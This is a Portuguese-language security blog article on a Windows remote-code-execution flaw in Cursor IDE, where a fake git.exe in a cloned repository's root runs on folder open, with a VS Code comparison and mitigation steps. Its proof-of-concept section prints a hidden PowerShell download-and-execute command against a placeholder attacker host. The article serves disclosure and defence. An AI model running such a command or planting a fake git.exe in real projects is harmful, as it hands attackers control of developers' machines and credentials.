RCE no Cursor IDE para Windows: O Perigo do Git Malicioso
Entenda como um repositório Git malicioso contendo um git.exe falso na raiz pode executar código arbitrário silenciosamente no Cursor IDE para Windows.

O desenvolvimento de software moderno passou por uma grande transformação com a chegada de ferramentas impulsionadas por Inteligência Artificial. Dentre elas, o Cursor IDE destacou-se como um dos ambientes favoritos de milhares de programadores por sua capacidade de autocompletar código contextualmente, gerar funções complexas e acelerar a depuração de erros. Contudo, essa rápida adoção e velocidade no desenvolvimento muitas vezes trazem riscos de segurança significativos.
Recentemente, pesquisadores da empresa de cibersegurança Mindgard revelaram uma vulnerabilidade crítica de execução remota de código (RCE) no Cursor IDE que afeta especificamente usuários de sistemas operacionais Windows. Essa falha de segurança permite que um invasor execute comandos de maneira silenciosa na máquina da vítima bastando que ela abra uma pasta de projeto contendo um repositório Git maliciosamente estruturado.
Como funciona o exploit de busca de binários no Cursor
A origem da vulnerabilidade reside em um problema de resolução do caminho de busca de arquivos e em um defeito de design no sistema de inicialização do controle de versão. Quando um programador abre um projeto ou espaço de trabalho no Cursor, o ambiente de desenvolvimento realiza uma série de verificações em segundo plano. Uma delas é a detecção do comando git para poder oferecer recursos de controle de versão, exibir ramificações ativas e permitir confirmações (commits) diretamente na interface gráfica do editor.
O problema é que no sistema operacional Windows, o IDE não limita a sua busca pelo binário git.exe aos diretórios do sistema configurados na variável de ambiente %PATH% (como C:\Program Files\Git\bin\git.exe). Em vez disso, ele prioriza o diretório raiz do espaço de trabalho aberto.
Se um agente de ameaça posicionar um executável malicioso renomeado para git.exe dentro da pasta raiz do projeto, o IDE executará esse binário de forma automática. Essa execução ocorre imediatamente após a abertura da pasta do projeto, sem necessitar de qualquer interação com o sistema de controle de versão e sem que o Windows exiba alertas de segurança.
Comparativo de gerenciamento de confiança e binários entre editores
Para compreender a gravidade dessa falha de design no Cursor IDE, podemos comparar o seu comportamento com o de outros editores de texto e ambientes de desenvolvimento do mercado:
| Característica de Segurança | VS Code (Corrigido/Seguro) | Cursor IDE (Vulnerável no Windows) |
|---|---|---|
| Prioridade de resolução do Git | Usa estritamente os caminhos configurados no sistema. | Prioriza a raiz do espaço de trabalho aberto. |
| Workspace Trust (Confiança) | Bloqueia extensões e tarefas até que ocorra aprovação do usuário. | Executa a inicialização de ferramentas antes de solicitar aprovação de confiança. |
| Interação necessária | O usuário deve aceitar interativamente a confiança da pasta. | Nenhuma. A execução é automática em segundo plano. |
| Impacto de abertura da pasta | Totalmente isolado e seguro. | Execução imediata de código arbitrário (RCE). |
Conforme exibido na tabela comparativa, enquanto a maioria dos editores modernos (incluindo o VS Code, no qual o Cursor é parcialmente baseado) contam com mecanismos rigorosos de Workspace Trust que bloqueiam qualquer execução automática de scripts ou ferramentas antes de o usuário aprovar a origem dos arquivos, o Cursor IDE ignora essa barreira ao executar o suposto binário do Git prematuramente.
Análise técnica da execução de comandos (PoC)
O ataque pode ser estruturado de forma muito simples, mas altamente destrutiva. Um invasor precisa apenas escrever um script ou compilar um programa compatível com o Windows, nomeá-lo como git.exe, e colocá-lo no diretório raiz de um repositório.
Por exemplo, um arquivo batch ou um binário malicioso em C++ poderia executar silenciosamente o PowerShell para se conectar ao servidor de comando e controle (C2) do invasor:
# Demonstração do comportamento de um git.exe falso
# O binário malicioso executa este comando para baixar e executar código na memória
Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" -WindowStyle Hidden
Quando o Cursor IDE detecta o espaço de trabalho, realiza chamadas internas equivalentes a:
C:\meu-projeto-clonado> git.exe status
Como o diretório de trabalho atual fica no início dos caminhos de busca implícitos no Windows para certos comandos de sistema, o arquivo local malicioso git.exe é executado no lugar do Git oficial do sistema. O invasor obtém assim a execução de código com o mesmo nível de privilégios do desenvolvedor que abriu o projeto.
O perigo real para a cadeia de suprimentos
Esse tipo de vulnerabilidade é extremamente perigoso devido ao fluxo de trabalho rotineiro dos engenheiros de software. Os programadores clonam constantemente repositórios públicos de plataformas como GitHub, GitLab ou Bitbucket para estudar bibliotecas open-source, testar dependências ou colaborar em projetos comunitários.
Se um invasor realizar uma campanha de engenharia social, comprometer a conta de um desenvolvedor legítimo ou criar uma bifurcação maliciosa (fork) de um repositório popular e inserir esse exploit, qualquer desenvolvedor no Windows que clonar e inspecionar o código usando o Cursor IDE terá o seu sistema comprometido em segundos.
Os invasores podem aproveitar esse acesso inicial para:
- Extrair variáveis de ambiente com credenciais de produção.
- Roubar chaves privadas de SSH armazenadas no diretório
~/.ssh. - Comprometer chaves de acesso a serviços de nuvem (AWS, Azure, Google Cloud).
- Implantar ransomware na rede corporativa à qual o desenvolvedor está conectado.
Medidas de mitigação recomendadas
Até que os desenvolvedores do Cursor publiquem uma atualização oficial que implemente restrições rigorosas de caminho de execução e corrija essa falha no Windows, é imperativo que adote as seguintes medidas de proteção:
- Evite abrir pastas desconhecidas diretamente: Não abra nenhuma pasta baixada da Internet no Windows através do Cursor sem antes examinar seu conteúdo de forma externa.
- Inspecione o diretório raiz: Antes de abrir um projeto no IDE, use o explorador de arquivos ou uma consola e verifique se não existem arquivos chamados
git,git.exeou executáveis suspeitos parecidos na raiz do projeto. - Utilize ferramentas de análise prévia: Se for clonar um repositório ou clicar em um link desconhecido, aconselhamos analisar a confiabilidade do link usando o Verificador de URLs da TecnoCrypter.
- Utilize ambientes de desenvolvimento isolados: Para inspecionar repositórios cuja procedência não seja totalmente confiável, faça uso de máquinas virtuais locais, contêineres Docker isolados ou o ambiente de isolamento nativo do Windows (Windows Sandbox).
- Migre temporariamente para terminais seguros: Você pode desativar a integração com o Git no editor visual e gerenciar todos os seus repositórios e comandos de controle de versão de forma manual através de uma consola PowerShell ou CMD padrão que não seja vulnerável a essa busca automática local.
Conclusão
A descoberta dessa vulnerabilidade no Cursor IDE nos lembra que as ferramentas de produtividade e desenvolvimento que usamos diariamente também são alvos prioritários para os cibercriminosos. A automatização sem limites e a falta de controles rígidos de Workspace Trust no Windows facilitam vetores de ataque simples e altamente eficazes.
Para manter a infraestrutura de desenvolvimento da sua empresa segura, mantenha todos os seus ambientes atualizados, adote políticas de desenvolvimento seguro e utilize ferramentas locais de verificação de ameaças. Se deseja aprender mais sobre compartilhamento seguro de informações, sugerimos ler o nosso artigo sobre como compartilhar senhas de forma segura na Internet ou aprender como os invasores extraem informações em a ameaça invisível dos metadados.


